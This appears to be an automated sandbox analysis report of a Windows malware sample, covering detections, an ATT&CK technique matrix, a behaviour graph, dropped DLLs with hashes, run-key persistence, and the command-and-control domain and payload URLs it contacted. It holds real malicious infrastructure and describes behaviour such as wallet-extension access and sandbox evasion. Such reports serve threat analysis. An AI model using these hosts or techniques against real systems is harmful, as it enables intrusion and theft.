                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.3d80000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.13a300b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.3bf05bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.3b41004.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.13e7a73.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.4fd5a53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.3d80000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.3bf05bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.13e7a73.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.3b41004.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.3a81053.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.13a300b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.3a81053.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.4fd5a53.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.3557268129.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3557221510.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3377534559.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3095889918.0000000004F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3217861470.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3095889918.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3217903493.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3623492196.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3040097047.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3622694265.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3058368131.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3377599757.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Fj0RhXL.exe PID: 5408, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Replication Through Removable Media
                      2
                      Native API
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      1
                      Credential API Hooking
                      12
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter
                      1
                      Registry Run Keys / Startup Folder
                      1
                      Access Token Manipulation
                      1
                      Deobfuscate/Decode Files or Information
                      121
                      Input Capture
                      11
                      Peripheral Device Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      1
                      Encrypted Channel
                      Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)222
                      Process Injection
                      2
                      Obfuscated Files or Information
                      Security Account Manager1
                      Account Discovery
                      SMB/Windows Admin Shares1
                      Screen Capture
                      3
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder
                      1
                      DLL Side-Loading
                      NTDS2
                      File and Directory Discovery
                      Distributed Component Object Model1
                      Credential API Hooking
                      3
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Masquerading
                      LSA Secrets217
                      System Information Discovery
                      SSH121
                      Input Capture
                      Fallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Modify Registry
                      Cached Domain Credentials551
                      Security Software Discovery
                      VNC3
                      Clipboard Data
                      Multiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items24
                      Virtualization/Sandbox Evasion
                      DCSync24
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation
                      Proc Filesystem3
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                      Process Injection
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Indicator Removal
                      Network Sniffing1
                      System Owner/User Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1511252 Sample: N6xnw0iEGs.exe Startdate: 14/09/2024 Architecture: WINDOWS Score: 100 30 ad59t82g.com 2->30 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for dropped file 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 9 other signatures 2->48 7 N6xnw0iEGs.exe 1 22 2->7         started        12 Fj0RhXL.exe 2->12         started        14 Fj0RhXL.exe 2->14         started        signatures3 process4 dnsIp5 32 ad59t82g.com 172.67.203.195, 49737, 49738, 80 CLOUDFLARENETUS United States 7->32 20 C:\Program Files (x86)\IemFNe\libcef.dll, PE32 7->20 dropped 22 C:\Program Files (x86)\...\VCRUNTIME140.dll, PE32 7->22 dropped 24 C:\Program Files (x86)\IemFNe\MSVCP140.dll, PE32 7->24 dropped 26 2 other malicious files 7->26 dropped 50 Found API chain indicative of debugger detection 7->50 16 Fj0RhXL.exe 3 7->16         started        52 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 12->52 54 Hides threads from debuggers 12->54 file6 signatures7 process8 dnsIp9 28 45.201.245.153, 49739, 49740, 49741 KINGCORP-KHOpenNetISPCambodiaKH Seychelles 16->28 34 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 16->34 36 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->36 38 Tries to access browser extension known for cryptocurrency wallets 16->38 40 Hides threads from debuggers 16->40 signatures10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      N6xnw0iEGs.exe21%ReversingLabs
                      N6xnw0iEGs.exe30%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      C:\Program Files (x86)\IemFNe\t4d.tmp100%AviraDR/FakePic.Gen
                      C:\Program Files (x86)\IemFNe\Fj0RhXL.exe0%ReversingLabs
                      C:\Program Files (x86)\IemFNe\Fj0RhXL.exe3%VirustotalBrowse
                      C:\Program Files (x86)\IemFNe\MSVCP140.dll0%ReversingLabs
                      C:\Program Files (x86)\IemFNe\MSVCP140.dll0%VirustotalBrowse
                      C:\Program Files (x86)\IemFNe\VCRUNTIME140.dll0%ReversingLabs
                      C:\Program Files (x86)\IemFNe\VCRUNTIME140.dll0%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      ad59t82g.com0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://tianyu.gm.163.com/user_help.html?paper_id=31030%Avira URL Cloudsafe
                      https://support.ubi.com/0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/tant.bmp0%Avira URL Cloudsafe
                      http://www.astrolog.org/astrolog.htm0%Avira URL Cloudsafe
                      https://www.geonames.org/Timezone0%Avira URL Cloudsafe
                      http://www.astro.com/swisseph.0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/t1.bmpp%s.exet5d.tmpt3d.tmpt4d.tmp%s%s.exeC:0%Avira URL Cloudsafe
                      http://www.astrolog.org/astrolog.htm0%VirustotalBrowse
                      https://www.geonames.org/Timezone0%VirustotalBrowse
                      https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/d.bmpWhttp://ad59t82g.com/1/t1.bmp0%Avira URL Cloudsafe
                      http://tianyu.gm.163.com/user_help.html?paper_id=31030%VirustotalBrowse
                      http://www.gnu.org0%Avira URL Cloudsafe
                      http://www.astro.com/swisseph.0%VirustotalBrowse
                      https://data.iana.org/time-zones/tz-link.htmlPostScript0%Avira URL Cloudsafe
                      https://support.ubi.com/0%VirustotalBrowse
                      http://tianyu.gm.163.com/submit_sub.html?paper_id=24810%Avira URL Cloudsafe
                      http://ad59t82g.com/1/d.bmpWhttp://ad59t82g.com/1/t1.bmp0%VirustotalBrowse
                      http://code.jquery.com/jquery-1.10.1.min.js0%Avira URL Cloudsafe
                      http://www.gnu.org0%VirustotalBrowse
                      http://ad59t82g.com/1/tant.bmpwininetmsvcrt0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/tant.bmp0%VirustotalBrowse
                      http://ad59t82g.com/1/text.bmpC:0%Avira URL Cloudsafe
                      https://data.iana.org/time-zones/tz-link.htmlPostScript0%VirustotalBrowse
                      http://code.jquery.com/jquery-1.10.1.min.js1%VirustotalBrowse
                      https://www.geonames.org/0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/t1.bmpp%s.exet5d.tmpt3d.tmpt4d.tmp%s%s.exeC:0%VirustotalBrowse
                      http://ad59t82g.com/1/tant.bmpwininetmsvcrt0%VirustotalBrowse
                      http://tianyu.gm.163.com/user_help.html?paper_id=2017#0%Avira URL Cloudsafe
                      http://tianyu.gm.163.com/submit_sub.html?paper_id=24810%VirustotalBrowse
                      http://www.astrolog.org/astrolog.htmMain0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/text.bmpC:0%VirustotalBrowse
                      https://data.iana.org/time-zones/tz-link.html0%Avira URL Cloudsafe
                      https://www.geonames.org/0%VirustotalBrowse
                      https://data.iana.org/time-zones/tz-link.html0%VirustotalBrowse
                      http://www.astrolog.org/astrolog.htmMain0%VirustotalBrowse
                      http://tianyu.gm.163.com/user_help.html?paper_id=2017#0%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ad59t82g.com
                      172.67.203.195
                      truefalseunknown
                      NameMaliciousAntivirus DetectionReputation
                      http://ad59t82g.com/1/tant.bmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://support.ubi.com/Fj0RhXL.exe, 00000006.00000002.3620905823.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000007.00000002.3078134311.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000008.00000002.3157887765.00000000007F3000.00000002.00000001.01000000.00000005.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.astrolog.org/astrolog.htmFj0RhXL.exe, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.geonames.org/TimezoneN6xnw0iEGs.exe, 00000000.00000003.2837571860.000000001003B000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000003.2956722511.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, Fj0RhXL.exe, 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tianyu.gm.163.com/user_help.html?paper_id=3103N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.astro.com/swisseph.libcef.dll.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://ad59t82g.com/1/t1.bmpp%s.exet5d.tmpt3d.tmpt4d.tmp%s%s.exeC:N6xnw0iEGs.exe, 00000000.00000002.2992400637.00000000053E9000.00000004.00000010.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequiredFj0RhXL.exe, 00000006.00000002.3620905823.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000007.00000002.3078134311.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000008.00000002.3157887765.00000000007F3000.00000002.00000001.01000000.00000005.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ad59t82g.com/1/d.bmpWhttp://ad59t82g.com/1/t1.bmpN6xnw0iEGs.exe, 00000000.00000002.2992400637.00000000053E9000.00000004.00000010.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.gnu.orglibcef.dll.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tianyu.gm.163.com/submit_sub.html?paper_id=2481N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://data.iana.org/time-zones/tz-link.htmlPostScriptN6xnw0iEGs.exe, 00000000.00000003.2837571860.000000001003B000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000003.2956722511.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, Fj0RhXL.exe, 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://code.jquery.com/jquery-1.10.1.min.jsN6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://ad59t82g.com/1/tant.bmpwininetmsvcrtN6xnw0iEGs.exe, 00000000.00000002.2987931723.000000000019C000.00000004.00000010.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://ad59t82g.com/1/text.bmpC:N6xnw0iEGs.exe, 00000000.00000002.2992400637.00000000053E9000.00000004.00000010.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.geonames.org/Fj0RhXL.exe, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tianyu.gm.163.com/user_help.html?paper_id=2017#N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.astrolog.org/astrolog.htmMainN6xnw0iEGs.exe, 00000000.00000003.2837571860.000000001003B000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000003.2956722511.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, Fj0RhXL.exe, 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://data.iana.org/time-zones/tz-link.htmlFj0RhXL.exe, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      45.201.245.153
                      unknownSeychelles
                      131178KINGCORP-KHOpenNetISPCambodiaKHtrue
                      172.67.203.195
                      ad59t82g.comUnited States
                      13335CLOUDFLARENETUSfalse
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1511252
                      Start date and time:2024-09-14 18:28:33 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 52s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:N6xnw0iEGs.exe
                      renamed because original name is a hash value
                      Original Sample Name:c9817d415d34ea3ae07094dae818ffe8e3fb1d5bcb13eb0e65fd361b7859eda7.exe
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.evad.winEXE@5/8@1/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 86%
                      • Number of executed functions: 113
                      • Number of non-executed functions: 269
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      TimeTypeDescription
                      12:32:13API Interceptor423x Sleep call for process: Fj0RhXL.exe modified
                      17:31:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WINDOWS C:\Program Files (x86)\IemFNe\Fj0RhXL.exe
                      17:31:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WINDOWS C:\Program Files (x86)\IemFNe\Fj0RhXL.exe
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      172.67.203.195TPBjZr973V.exeGet hashmaliciousFormBookBrowse
                      • www.rkcrss.online/uhq3/?g6A=MfaDQ4fMFH9m1I/uR5STbfUnP7Ib2sWcdVrgLGvxTD4fX0D/Mg4QJoRuH1Zq5f9EgDL2WZTxXA==&TBZd=0DK8nTi0KDMh3V
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      KINGCORP-KHOpenNetISPCambodiaKHLisectAVT_2403002B_137.dllGet hashmaliciousTrickbotBrowse
                      • 45.201.136.3
                      LisectAVT_2403002B_312.dllGet hashmaliciousTrickbotBrowse
                      • 45.201.136.3
                      LisectAVT_2403002C_42.dllGet hashmaliciousTrickbotBrowse
                      • 45.201.136.3
                      h.x86-20240610-0050.elfGet hashmaliciousMirai, OkiruBrowse
                      • 45.201.177.43
                      t3CBipL4lt.elfGet hashmaliciousMiraiBrowse
                      • 45.201.177.12
                      n5vjWNCONy.elfGet hashmaliciousMiraiBrowse
                      • 45.201.177.35
                      U6d2xCNMT4.elfGet hashmaliciousMiraiBrowse
                      • 42.115.58.176
                      huhu.mips.elfGet hashmaliciousMirai, OkiruBrowse
                      • 45.201.177.14
                      dB59qt9wv8.elfGet hashmaliciousMiraiBrowse
                      • 42.115.58.159
                      g0qrQaDp4C.elfGet hashmaliciousMiraiBrowse
                      • 45.201.128.80
                      CLOUDFLARENETUShttps://nnwdryn4me2.typeform.com/to/vzxAdnuI?utm_source=www.thedeepview.co&utm_medium=newsletter&utm_campaign=u-s-hospital-teams-up-with-suki-for-an-ai-assistant&_bhlid=899a446fb8590c3f4dab42c864907d7822828cadGet hashmaliciousUnknownBrowse
                      • 104.16.117.116
                      BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • 104.20.23.46
                      Loader.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                      • 104.21.85.189
                      sntmr.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 172.67.136.135
                      setup3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, SmokeLoaderBrowse
                      • 172.67.136.135
                      vfdjg.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 172.67.136.135
                      https://os50-card.ru/50Get hashmaliciousUnknownBrowse
                      • 104.17.25.14
                      66e40b2e8a52e_lfsdj.exeGet hashmaliciousLummaCBrowse
                      • 104.21.38.33
                      app__v6.20.5_.msiGet hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      Setup.exeGet hashmaliciousLummaCBrowse
                      • 188.114.97.3
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Program Files (x86)\IemFNe\Fj0RhXL.exenOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                        pXm5oVO3Go.exeGet hashmaliciousNitolBrowse
                          Rudvfa0Z17.exeGet hashmaliciousNitolBrowse
                            nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                              C:\Program Files (x86)\IemFNe\MSVCP140.dllnOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                                pXm5oVO3Go.exeGet hashmaliciousNitolBrowse
                                  Rudvfa0Z17.exeGet hashmaliciousNitolBrowse
                                    nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                                      https://downloads.linktek.com/LR/SetupLinkReporter.zipGet hashmaliciousUnknownBrowse
                                        Process:C:\Users\user\Desktop\N6xnw0iEGs.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):6453568
                                        Entropy (8bit):7.944493660771585
                                        Encrypted:false
                                        SSDEEP:196608:fW1Hje3HvntQwZSPyl7N6nds1HhmwcOaXr:myvtrxBL1QSaXr
                                        MD5:C8E8EEAF5464AF1A188B3DC12C890813
                                        SHA1:2DF041366B9DE8A2B982205B15F7264145E81644
                                        SHA-256:E528455778D952ACFC5B330B378F2C53CC92E55CFEAB1C1E1DBB52E01D626BB4
                                        SHA-512:8119BD5A7FE790F1EBF1B2C5411264C32A193718851746C26183B8A48293D61E8F9F3EEB97CC851A419B5B41038BC63BFFD17E99907AD4F8CDEE63F7151DBE46
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 3%, Browse
                                        Joe Sandbox View:
                                        • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                        • Filename: pXm5oVO3Go.exe, Detection: malicious, Browse
                                        • Filename: Rudvfa0Z17.exe, Detection: malicious, Browse
                                        • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f...............'..?.................0?...@..........................@.......kc.....................................`........0..u............Pb.@)..................................d.}.........@.............{..............................text...R.?......................... ..`.rdata.......0?.....................@..@.data...T.....H.....................@....idata...Q....J.....................@..@.tls......... K.....................@....00cfg.......0K.....................@..@.ubx0...z....@K.....................`..`.ubx1...`A_...y..B_.................`..`.rsrc...u....0.......J_.............@..@........................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\N6xnw0iEGs.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):436600
                                        Entropy (8bit):6.647460578716755
                                        Encrypted:false
                                        SSDEEP:12288:mgU0BGzePo6+J+4P0xYv7IQgihUgiW6QR7t5s03Ooc8dHkC2esMoWKl:I01Po6+J+dxYv7IQgR03Ooc8dHkC2e50
                                        MD5:C092885EA11BD80D35CB55C7D488F1E2
                                        SHA1:BFE2F5141AF49724A54C838B9A9CB6E54C4A6AA5
                                        SHA-256:885A0A146A83B0D5A19B88C4EB6372B648CFAED817BD31D8CD3FB91313DEA13D
